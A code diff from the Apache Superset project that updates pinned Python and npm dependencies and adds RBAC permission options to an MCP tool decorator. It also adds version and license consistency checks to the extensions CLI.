prompt-toolkit==3.0.51
|
||||
# via click-repl
|
||||
pyarrow==16.1.0
|
||||
# via apache-superset (pyproject.toml)
|
||||
pyasn1==0.6.2
|
||||
pyarrow==20.0.0
|
||||
# via
|
||||
# -r requirements/base.in
|
||||
# apache-superset (pyproject.toml)
|
||||
pyasn1==0.6.3
|
||||
# via
|
||||
# pyasn1-modules
|
||||
# rsa
|
||||
@@ -309,9 +312,9 @@ pydantic-core==2.33.2
|
||||
# via pydantic
|
||||
pygeohash==3.2.2
|
||||
# via apache-superset (pyproject.toml)
|
||||
pygments==2.19.1
|
||||
pygments==2.20.0
|
||||
# via rich
|
||||
pyjwt==2.10.1
|
||||
pyjwt==2.12.0
|
||||
# via
|
||||
# apache-superset (pyproject.toml)
|
||||
# flask-appbuilder
|
||||
@@ -319,8 +322,10 @@ pyjwt==2.10.1
|
||||
# redis
|
||||
pynacl==1.6.2
|
||||
# via paramiko
|
||||
pyopenssl==25.3.0
|
||||
# via shillelagh
|
||||
pyopenssl==26.0.0
|
||||
# via
|
||||
# -r requirements/base.in
|
||||
# shillelagh
|
||||
pyparsing==3.2.3
|
||||
# via apache-superset (pyproject.toml)
|
||||
pysocks==1.7.1
|
||||
@@ -353,8 +358,9 @@ referencing==0.36.2
|
||||
# via
|
||||
# jsonschema
|
||||
# jsonschema-specifications
|
||||
requests==2.32.4
|
||||
requests==2.33.0
|
||||
# via
|
||||
# -r requirements/base.in
|
||||
# requests-cache
|
||||
# shillelagh
|
||||
requests-cache==1.2.1
|
||||
@@ -363,6 +369,8 @@ rfc3339-validator==0.1.4
|
||||
# via openapi-schema-validator
|
||||
rich==13.9.4
|
||||
# via flask-limiter
|
||||
rison==2.0.0
|
||||
# via apache-superset (pyproject.toml)
|
||||
rpds-py==0.25.0
|
||||
# via
|
||||
# jsonschema
|
||||
|
||||
@@ -10,6 +10,8 @@
|
||||
# via
|
||||
# -r requirements/development.in
|
||||
# apache-superset
|
||||
aiofile==3.9.0
|
||||
# via py-key-value-aio
|
||||
alembic==1.15.2
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -26,8 +28,10 @@ anyio==4.11.0
|
||||
# via
|
||||
# httpx
|
||||
# mcp
|
||||
# py-key-value-aio
|
||||
# sse-starlette
|
||||
# starlette
|
||||
# watchfiles
|
||||
apispec==6.6.1
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -65,9 +69,7 @@ bcrypt==4.3.0
|
||||
# -c requirements/base-constraint.txt
|
||||
# paramiko
|
||||
beartype==0.22.5
|
||||
# via
|
||||
# py-key-value-aio
|
||||
# py-key-value-shared
|
||||
# via py-key-value-aio
|
||||
billiard==4.2.1
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -100,6 +102,8 @@ cachetools==6.2.1
|
||||
# -c requirements/base-constraint.txt
|
||||
# google-auth
|
||||
# py-key-value-aio
|
||||
caio==0.9.25
|
||||
# via aiofile
|
||||
cattrs==25.1.1
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -138,7 +142,6 @@ click==8.2.1
|
||||
# click-repl
|
||||
# flask
|
||||
# flask-appbuilder
|
||||
# typer
|
||||
# uvicorn
|
||||
click-didyoumean==0.3.1
|
||||
# via
|
||||
@@ -156,8 +159,6 @@ click-repl==0.3.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# celery
|
||||
cloudpickle==3.1.2
|
||||
# via pydocket
|
||||
cmdstanpy==1.1.0
|
||||
# via prophet
|
||||
colorama==0.4.6
|
||||
@@ -177,7 +178,7 @@ croniter==6.0.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
cryptography==46.0.5
|
||||
cryptography==46.0.7
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
@@ -206,8 +207,6 @@ deprecation==2.1.0
|
||||
# apache-superset
|
||||
dill==0.4.0
|
||||
# via pylint
|
||||
diskcache==5.6.3
|
||||
# via py-key-value-aio
|
||||
distlib==0.3.8
|
||||
# via virtualenv
|
||||
dnspython==2.7.0
|
||||
@@ -237,9 +236,7 @@ et-xmlfile==2.0.0
|
||||
# openpyxl
|
||||
exceptiongroup==1.3.0
|
||||
# via fastmcp
|
||||
fakeredis==2.32.1
|
||||
# via pydocket
|
||||
fastmcp==2.14.3
|
||||
fastmcp==3.1.0
|
||||
# via apache-superset
|
||||
filelock==3.20.3
|
||||
# via
|
||||
@@ -262,7 +259,7 @@ flask==2.3.3
|
||||
# flask-sqlalchemy
|
||||
# flask-testing
|
||||
# flask-wtf
|
||||
flask-appbuilder==5.0.2
|
||||
flask-appbuilder==5.2.1
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
@@ -474,6 +471,8 @@ jsonpath-ng==1.7.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
jsonref==1.1.0
|
||||
# via fastmcp
|
||||
jsonschema==4.23.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -504,14 +503,12 @@ limits==5.1.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# flask-limiter
|
||||
lupa==2.6
|
||||
# via fakeredis
|
||||
mako==1.3.10
|
||||
mako==1.3.11
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# alembic
|
||||
# apache-superset
|
||||
markdown==3.8
|
||||
markdown==3.8.1
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
@@ -583,7 +580,6 @@ numpy==1.26.4
|
||||
# pandas
|
||||
# pandas-gbq
|
||||
# prophet
|
||||
# pyarrow
|
||||
oauthlib==3.2.2
|
||||
# via requests-oauthlib
|
||||
odfpy==1.4.1
|
||||
@@ -603,7 +599,7 @@ openpyxl==3.1.5
|
||||
# -c requirements/base-constraint.txt
|
||||
# pandas
|
||||
opentelemetry-api==1.39.1
|
||||
# via pydocket
|
||||
# via fastmcp
|
||||
ordered-set==4.1.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -622,6 +618,7 @@ packaging==25.0
|
||||
# deprecation
|
||||
# docker
|
||||
# duckdb-engine
|
||||
# fastmcp
|
||||
# google-cloud-bigquery
|
||||
# gunicorn
|
||||
# limits
|
||||
@@ -653,13 +650,11 @@ parsedatetime==2.6
|
||||
# apache-superset
|
||||
pathable==0.4.3
|
||||
# via jsonschema-path
|
||||
pathvalidate==3.3.1
|
||||
# via py-key-value-aio
|
||||
pgsanity==0.2.9
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
pillow==11.3.0
|
||||
pillow==12.2.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
@@ -691,8 +686,6 @@ prison==0.2.1
|
||||
# flask-appbuilder
|
||||
progress==1.6
|
||||
# via apache-superset
|
||||
prometheus-client==0.23.1
|
||||
# via pydocket
|
||||
prompt-toolkit==3.0.51
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -714,19 +707,15 @@ psutil==6.1.0
|
||||
# via apache-superset
|
||||
psycopg2-binary==2.9.9
|
||||
# via apache-superset
|
||||
py-key-value-aio==0.3.0
|
||||
# via
|
||||
# fastmcp
|
||||
# pydocket
|
||||
py-key-value-shared==0.3.0
|
||||
# via py-key-value-aio
|
||||
pyarrow==16.1.0
|
||||
py-key-value-aio==0.4.4
|
||||
# via fastmcp
|
||||
pyarrow==20.0.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
# db-dtypes
|
||||
# pandas-gbq
|
||||
pyasn1==0.6.2
|
||||
pyasn1==0.6.3
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# pyasn1-modules
|
||||
@@ -758,8 +747,6 @@ pydantic-settings==2.10.1
|
||||
# via mcp
|
||||
pydata-google-auth==1.9.0
|
||||
# via pandas-gbq
|
||||
pydocket==0.17.1
|
||||
# via fastmcp
|
||||
pydruid==0.6.9
|
||||
# via apache-superset
|
||||
pyfakefs==5.3.5
|
||||
@@ -768,7 +755,7 @@ pygeohash==3.2.2
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
pygments==2.19.1
|
||||
pygments==2.20.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# rich
|
||||
@@ -776,7 +763,7 @@ pyhive==0.7.0
|
||||
# via apache-superset
|
||||
pyinstrument==4.4.0
|
||||
# via apache-superset
|
||||
pyjwt==2.10.1
|
||||
pyjwt==2.12.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
@@ -790,7 +777,7 @@ pynacl==1.6.2
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# paramiko
|
||||
pyopenssl==25.3.0
|
||||
pyopenssl==26.0.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# shillelagh
|
||||
@@ -844,8 +831,6 @@ python-dotenv==1.1.0
|
||||
# apache-superset
|
||||
# fastmcp
|
||||
# pydantic-settings
|
||||
python-json-logger==4.0.0
|
||||
# via pydocket
|
||||
python-ldap==3.4.4
|
||||
# via apache-superset
|
||||
python-multipart==0.0.20
|
||||
@@ -866,22 +851,20 @@ pyyaml==6.0.2
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
# apispec
|
||||
# fastmcp
|
||||
# jsonschema-path
|
||||
# pre-commit
|
||||
redis==5.3.1
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
# fakeredis
|
||||
# py-key-value-aio
|
||||
# pydocket
|
||||
referencing==0.36.2
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# jsonschema
|
||||
# jsonschema-path
|
||||
# jsonschema-specifications
|
||||
requests==2.32.4
|
||||
requests==2.33.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# docker
|
||||
@@ -910,11 +893,13 @@ rich==13.9.4
|
||||
# cyclopts
|
||||
# fastmcp
|
||||
# flask-limiter
|
||||
# pydocket
|
||||
# rich-rst
|
||||
# typer
|
||||
rich-rst==1.3.1
|
||||
# via cyclopts
|
||||
rison==2.0.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
rpds-py==0.25.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -944,8 +929,6 @@ setuptools==80.9.0
|
||||
# pydata-google-auth
|
||||
# zope-event
|
||||
# zope-interface
|
||||
shellingham==1.5.4
|
||||
# via typer
|
||||
shillelagh==1.4.3
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -973,7 +956,6 @@ sniffio==1.3.1
|
||||
sortedcontainers==2.4.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# fakeredis
|
||||
# trio
|
||||
sqlalchemy==1.4.54
|
||||
# via
|
||||
@@ -1013,10 +995,14 @@ starlette==0.49.1
|
||||
# via mcp
|
||||
statsd==4.0.1
|
||||
# via apache-superset
|
||||
syntaqlite==0.1.0
|
||||
# via apache-superset
|
||||
tabulate==0.9.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
tomli-w==1.2.0
|
||||
# via apache-superset-extensions-cli
|
||||
tomlkit==0.13.3
|
||||
# via pylint
|
||||
tqdm==4.67.1
|
||||
@@ -1034,8 +1020,6 @@ trio-websocket==0.12.2
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
# selenium
|
||||
typer==0.20.0
|
||||
# via pydocket
|
||||
typing-extensions==4.15.0
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -1048,16 +1032,14 @@ typing-extensions==4.15.0
|
||||
# limits
|
||||
# mcp
|
||||
# opentelemetry-api
|
||||
# py-key-value-shared
|
||||
# py-key-value-aio
|
||||
# pydantic
|
||||
# pydantic-core
|
||||
# pydocket
|
||||
# pyopenssl
|
||||
# referencing
|
||||
# selenium
|
||||
# shillelagh
|
||||
# starlette
|
||||
# typer
|
||||
# typing-inspection
|
||||
typing-inspection==0.4.1
|
||||
# via
|
||||
@@ -1072,6 +1054,8 @@ tzdata==2025.2
|
||||
# pandas
|
||||
tzlocal==5.2
|
||||
# via trino
|
||||
uncalled-for==0.2.0
|
||||
# via fastmcp
|
||||
url-normalize==2.2.1
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
@@ -1101,6 +1085,8 @@ watchdog==6.0.0
|
||||
# -c requirements/base-constraint.txt
|
||||
# apache-superset
|
||||
# apache-superset-extensions-cli
|
||||
watchfiles==1.1.1
|
||||
# via fastmcp
|
||||
wcwidth==0.2.13
|
||||
# via
|
||||
# -c requirements/base-constraint.txt
|
||||
|
||||
@@ -18,20 +18,20 @@
|
||||
|
||||
[project]
|
||||
name = "apache-superset-core"
|
||||
version = "0.1.0rc1"
|
||||
version = "0.1.0rc2"
|
||||
description = "Core Python package for building Apache Superset backend extensions and integrations"
|
||||
readme = "README.md"
|
||||
authors = [
|
||||
{ name = "Apache Software Foundation", email = "dev@superset.apache.org" },
|
||||
]
|
||||
license = { file="LICENSE.txt" }
|
||||
license = "Apache-2.0"
|
||||
license-files = ["LICENSE.txt"]
|
||||
requires-python = ">=3.10"
|
||||
keywords = ["superset", "apache", "analytics", "business-intelligence", "extensions", "visualization"]
|
||||
classifiers = [
|
||||
"Development Status :: 3 - Alpha",
|
||||
"Environment :: Web Environment",
|
||||
"Intended Audience :: Developers",
|
||||
"License :: OSI Approved :: Apache Software License",
|
||||
"Operating System :: OS Independent",
|
||||
"Programming Language :: Python :: 3",
|
||||
"Programming Language :: Python :: 3.10",
|
||||
|
||||
@@ -37,6 +37,13 @@ Usage:
|
||||
|
||||
from typing import Any, Callable, TypeVar
|
||||
|
||||
try:
|
||||
from mcp.types import ToolAnnotations
|
||||
except (
|
||||
ImportError
|
||||
): # MCP extras may not be installed in superset-core-only environments
|
||||
ToolAnnotations = dict
|
||||
|
||||
# Type variable for decorated functions
|
||||
F = TypeVar("F", bound=Callable[..., Any])
|
||||
|
||||
@@ -48,11 +55,15 @@ def tool(
|
||||
description: str | None = None,
|
||||
tags: list[str] | None = None,
|
||||
protect: bool = True,
|
||||
class_permission_name: str | None = None,
|
||||
method_permission_name: str | None = None,
|
||||
annotations: ToolAnnotations | None = None,
|
||||
) -> Any: # Use Any to avoid mypy issues with dependency injection
|
||||
"""
|
||||
Decorator to register an MCP tool with optional authentication.
|
||||
|
||||
This decorator combines FastMCP tool registration with optional authentication.
|
||||
This decorator combines FastMCP tool registration with optional authentication
|
||||
and RBAC permission checking.
|
||||
|
||||
Can be used as:
|
||||
@tool
|
||||
@@ -69,6 +80,13 @@ def tool(
|
||||
description: Tool description (defaults to function docstring)
|
||||
tags: List of tags for categorizing the tool (defaults to empty list)
|
||||
protect: Whether to require Superset authentication (defaults to True)
|
||||
class_permission_name: FAB view/resource name for RBAC checking
|
||||
(e.g., "Chart", "Dashboard", "SQLLab"). When set, enables
|
||||
permission checking via security_manager.can_access().
|
||||
method_permission_name: FAB action name (e.g., "read", "write").
|
||||
Defaults to "write" if tags includes "mutate", else "read".
|
||||
annotations: MCP tool annotations (title, readOnlyHint, destructiveHint, etc.)
|
||||
These hints help MCP clients understand tool behavior and safety.
|
||||
|
||||
Returns:
|
||||
Decorator function that registers and wraps the tool, or the wrapped function
|
||||
@@ -90,6 +108,18 @@ def tool(
|
||||
def public_tool() -> str:
|
||||
'''Public tool accessible without auth'''
|
||||
return "Hello world"
|
||||
|
||||
@tool(class_permission_name="Chart") # RBAC: requires can_read on Chart
|
||||
def list_charts() -> list:
|
||||
'''List charts the user can access'''
|
||||
return []
|
||||
|
||||
@tool( # RBAC: can_write on Chart
|
||||
tags=["mutate"], class_permission_name="Chart",
|
||||
)
|
||||
def create_chart(name: str) -> dict:
|
||||
'''Create a new chart'''
|
||||
return {"name": name}
|
||||
"""
|
||||
raise NotImplementedError(
|
||||
"MCP tool decorator not initialized. "
|
||||
@@ -158,4 +188,5 @@ def prompt(
|
||||
__all__ = [
|
||||
"tool",
|
||||
"prompt",
|
||||
"ToolAnnotations",
|
||||
]
|
||||
|
||||
88
superset-embedded-sdk/package-lock.json
generated
88
superset-embedded-sdk/package-lock.json
generated
@@ -7025,9 +7025,9 @@
|
||||
"dev": true
|
||||
},
|
||||
"node_modules/picomatch": {
|
||||
"version": "2.3.1",
|
||||
"resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz",
|
||||
"integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==",
|
||||
"version": "2.3.2",
|
||||
"resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz",
|
||||
"integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==",
|
||||
"dev": true,
|
||||
"engines": {
|
||||
"node": ">=8.6"
|
||||
@@ -7121,15 +7121,6 @@
|
||||
}
|
||||
]
|
||||
},
|
||||
"node_modules/randombytes": {
|
||||
"version": "2.1.0",
|
||||
"resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz",
|
||||
"integrity": "sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==",
|
||||
"dev": true,
|
||||
"dependencies": {
|
||||
"safe-buffer": "^5.1.0"
|
||||
}
|
||||
},
|
||||
"node_modules/react-is": {
|
||||
"version": "18.3.1",
|
||||
"resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz",
|
||||
@@ -7306,26 +7297,6 @@
|
||||
"node": ">=10"
|
||||
}
|
||||
},
|
||||
"node_modules/safe-buffer": {
|
||||
"version": "5.2.1",
|
||||
"resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz",
|
||||
"integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==",
|
||||
"dev": true,
|
||||
"funding": [
|
||||
{
|
||||
"type": "github",
|
||||
"url": "https://github.com/sponsors/feross"
|
||||
},
|
||||
{
|
||||
"type": "patreon",
|
||||
"url": "https://www.patreon.com/feross"
|
||||
},
|
||||
{
|
||||
"type": "consulting",
|
||||
"url": "https://feross.org/support"
|
||||
}
|
||||
]
|
||||
},
|
||||
"node_modules/schema-utils": {
|
||||
"version": "4.3.3",
|
||||
"resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.3.tgz",
|
||||
@@ -7355,15 +7326,6 @@
|
||||
"semver": "bin/semver.js"
|
||||
}
|
||||
},
|
||||
"node_modules/serialize-javascript": {
|
||||
"version": "6.0.2",
|
||||
"resolved": "https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-6.0.2.tgz",
|
||||
"integrity": "sha512-Saa1xPByTTq2gdeFZYLLo+RFE35NHZkAbqZeWNd3BpzppeVisAqpDjcp8dyf6uIvEqJRd46jemmyA4iFIeVk8g==",
|
||||
"dev": true,
|
||||
"dependencies": {
|
||||
"randombytes": "^2.1.0"
|
||||
}
|
||||
},
|
||||
"node_modules/shallow-clone": {
|
||||
"version": "3.0.1",
|
||||
"resolved": "https://registry.npmjs.org/shallow-clone/-/shallow-clone-3.0.1.tgz",
|
||||
@@ -7590,15 +7552,14 @@
|
||||
}
|
||||
},
|
||||
"node_modules/terser-webpack-plugin": {
|
||||
"version": "5.3.16",
|
||||
"resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.3.16.tgz",
|
||||
"integrity": "sha512-h9oBFCWrq78NyWWVcSwZarJkZ01c2AyGrzs1crmHZO3QUg9D61Wu4NPjBy69n7JqylFF5y+CsUZYmYEIZ3mR+Q==",
|
||||
"version": "5.4.0",
|
||||
"resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.4.0.tgz",
|
||||
"integrity": "sha512-Bn5vxm48flOIfkdl5CaD2+1CiUVbonWQ3KQPyP7/EuIl9Gbzq/gQFOzaMFUEgVjB1396tcK0SG8XcNJ/2kDH8g==",
|
||||
"dev": true,
|
||||
"dependencies": {
|
||||
"@jridgewell/trace-mapping": "^0.3.25",
|
||||
"jest-worker": "^27.4.5",
|
||||
"schema-utils": "^4.3.0",
|
||||
"serialize-javascript": "^6.0.2",
|
||||
"terser": "^5.31.1"
|
||||
},
|
||||
"engines": {
|
||||
@@ -13159,9 +13120,9 @@
|
||||
"dev": true
|
||||
},
|
||||
"picomatch": {
|
||||
"version": "2.3.1",
|
||||
"resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz",
|
||||
"integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==",
|
||||
"version": "2.3.2",
|
||||
"resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz",
|
||||
"integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==",
|
||||
"dev": true
|
||||
},
|
||||
"pify": {
|
||||
@@ -13220,15 +13181,6 @@
|
||||
"integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==",
|
||||
"dev": true
|
||||
},
|
||||
"randombytes": {
|
||||
"version": "2.1.0",
|
||||
"resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz",
|
||||
"integrity": "sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==",
|
||||
"dev": true,
|
||||
"requires": {
|
||||
"safe-buffer": "^5.1.0"
|
||||
}
|
||||
},
|
||||
"react-is": {
|
||||
"version": "18.3.1",
|
||||
"resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz",
|
||||
@@ -13359,12 +13311,6 @@
|
||||
"integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==",
|
||||
"dev": true
|
||||
},
|
||||
"safe-buffer": {
|
||||
"version": "5.2.1",
|
||||
"resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz",
|
||||
"integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==",
|
||||
"dev": true
|
||||
},
|
||||
"schema-utils": {
|
||||
"version": "4.3.3",
|
||||
"resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.3.tgz",
|
||||
@@ -13383,15 +13329,6 @@
|
||||
"integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==",
|
||||
"dev": true
|
||||
},
|
||||
"serialize-javascript": {
|
||||
"version": "6.0.2",
|
||||
"resolved": "https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-6.0.2.tgz",
|
||||
"integrity": "sha512-Saa1xPByTTq2gdeFZYLLo+RFE35NHZkAbqZeWNd3BpzppeVisAqpDjcp8dyf6uIvEqJRd46jemmyA4iFIeVk8g==",
|
||||
"dev": true,
|
||||
"requires": {
|
||||
"randombytes": "^2.1.0"
|
||||
}
|
||||
},
|
||||
"shallow-clone": {
|
||||
"version": "3.0.1",
|
||||
"resolved": "https://registry.npmjs.org/shallow-clone/-/shallow-clone-3.0.1.tgz",
|
||||
@@ -13563,15 +13500,14 @@
|
||||
}
|
||||
},
|
||||
"terser-webpack-plugin": {
|
||||
"version": "5.3.16",
|
||||
"resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.3.16.tgz",
|
||||
"integrity": "sha512-h9oBFCWrq78NyWWVcSwZarJkZ01c2AyGrzs1crmHZO3QUg9D61Wu4NPjBy69n7JqylFF5y+CsUZYmYEIZ3mR+Q==",
|
||||
"version": "5.4.0",
|
||||
"resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.4.0.tgz",
|
||||
"integrity": "sha512-Bn5vxm48flOIfkdl5CaD2+1CiUVbonWQ3KQPyP7/EuIl9Gbzq/gQFOzaMFUEgVjB1396tcK0SG8XcNJ/2kDH8g==",
|
||||
"dev": true,
|
||||
"requires": {
|
||||
"@jridgewell/trace-mapping": "^0.3.25",
|
||||
"jest-worker": "^27.4.5",
|
||||
"schema-utils": "^4.3.0",
|
||||
"serialize-javascript": "^6.0.2",
|
||||
"terser": "^5.31.1"
|
||||
}
|
||||
},
|
||||
|
||||
@@ -17,20 +17,20 @@
|
||||
|
||||
[project]
|
||||
name = "apache-superset-extensions-cli"
|
||||
version = "0.1.0rc1"
|
||||
version = "0.1.0rc2"
|
||||
description = "Official command-line interface for building, bundling, and managing Apache Superset extensions"
|
||||
readme = "README.md"
|
||||
authors = [
|
||||
{ name = "Apache Software Foundation", email = "dev@superset.apache.org" },
|
||||
]
|
||||
license = { file="LICENSE.txt" }
|
||||
license = "Apache-2.0"
|
||||
license-files = ["LICENSE.txt"]
|
||||
requires-python = ">=3.10"
|
||||
keywords = ["superset", "apache", "cli", "extensions", "analytics", "business-intelligence", "development-tools"]
|
||||
classifiers = [
|
||||
"Development Status :: 3 - Alpha",
|
||||
"Environment :: Console",
|
||||
"Intended Audience :: Developers",
|
||||
"License :: OSI Approved :: Apache Software License",
|
||||
"Operating System :: OS Independent",
|
||||
"Programming Language :: Python :: 3",
|
||||
"Programming Language :: Python :: 3.10",
|
||||
@@ -49,6 +49,7 @@ dependencies = [
|
||||
"jinja2>=3.1.6",
|
||||
"semver>=3.0.4",
|
||||
"tomli>=2.2.1; python_version < '3.11'",
|
||||
"tomli-w>=1.2.0",
|
||||
"watchdog>=6.0.0",
|
||||
]
|
||||
|
||||
|
||||
@@ -50,6 +50,8 @@ from superset_extensions_cli.utils import (
|
||||
validate_display_name,
|
||||
validate_publisher,
|
||||
validate_technical_name,
|
||||
write_json,
|
||||
write_toml,
|
||||
)
|
||||
|
||||
REMOTE_ENTRY_REGEX = re.compile(r"^remoteEntry\..+\.js$")
|
||||
@@ -292,6 +294,7 @@ def app() -> None:
|
||||
|
||||
@app.command()
|
||||
def validate() -> None:
|
||||
"""Validate the extension structure and metadata consistency."""
|
||||
validate_npm()
|
||||
|
||||
cwd = Path.cwd()
|
||||
@@ -372,12 +375,167 @@ def validate() -> None:
|
||||
click.secho(" Convention requires: frontend/src/index.tsx", fg="yellow")
|
||||
sys.exit(1)
|
||||
|
||||
# Validate version and license consistency across extension.json, frontend, and backend
|
||||
mismatches: list[str] = []
|
||||
frontend_pkg_path = cwd / "frontend" / "package.json"
|
||||
frontend_pkg = None
|
||||
if frontend_pkg_path.is_file():
|
||||
frontend_pkg = read_json(frontend_pkg_path)
|
||||
if frontend_pkg:
|
||||
if frontend_pkg.get("version") != extension.version:
|
||||
mismatches.append(
|
||||
f" frontend/package.json version: {frontend_pkg.get('version')} "
|
||||
f"(expected {extension.version})"
|
||||
)
|
||||
if extension.license and frontend_pkg.get("license") != extension.license:
|
||||
mismatches.append(
|
||||
f" frontend/package.json license: {frontend_pkg.get('license')} "
|
||||
f"(expected {extension.license})"
|
||||
)
|
||||
|
||||
backend_pyproject_path = cwd / "backend" / "pyproject.toml"
|
||||
if backend_pyproject_path.is_file():
|
||||
backend_pyproject = read_toml(backend_pyproject_path)
|
||||
if backend_pyproject:
|
||||
project = backend_pyproject.get("project", {})
|
||||
if project.get("version") != extension.version:
|
||||
mismatches.append(
|
||||
f" backend/pyproject.toml version: {project.get('version')} "
|
||||
f"(expected {extension.version})"
|
||||
)
|
||||
if extension.license and project.get("license") != extension.license:
|
||||
mismatches.append(
|
||||
f" backend/pyproject.toml license: {project.get('license')} "
|
||||
f"(expected {extension.license})"
|
||||
)
|
||||
|
||||
if mismatches:
|
||||
click.secho("❌ Metadata mismatch detected:", err=True, fg="red")
|
||||
for mismatch in mismatches:
|
||||
click.secho(mismatch, err=True, fg="red")
|
||||
click.secho(
|
||||
"Run `superset-extensions update` to sync from extension.json.",
|
||||
fg="yellow",
|
||||
)
|
||||
sys.exit(1)
|
||||
|
||||
click.secho("✅ Validation successful", fg="green")
|
||||
|
||||
|
||||
@app.command()
|
||||
@click.option(
|
||||
"--version",
|
||||
"version_opt",
|
||||
is_flag=False,
|
||||
flag_value="__prompt__",
|
||||
default=None,
|
||||
help="Set a new version. Prompts for value if none given.",
|
||||
)
|
||||
@click.option(
|
||||
"--license",
|
||||
"license_opt",
|
||||
is_flag=False,
|
||||
flag_value="__prompt__",
|
||||
default=None,
|
||||
help="Set a new license. Prompts for value if none given.",
|
||||
)
|
||||
def update(version_opt: str | None, license_opt: str | None) -> None:
|
||||
"""Update derived and generated files in the extension project."""
|
||||
cwd = Path.cwd()
|
||||
|
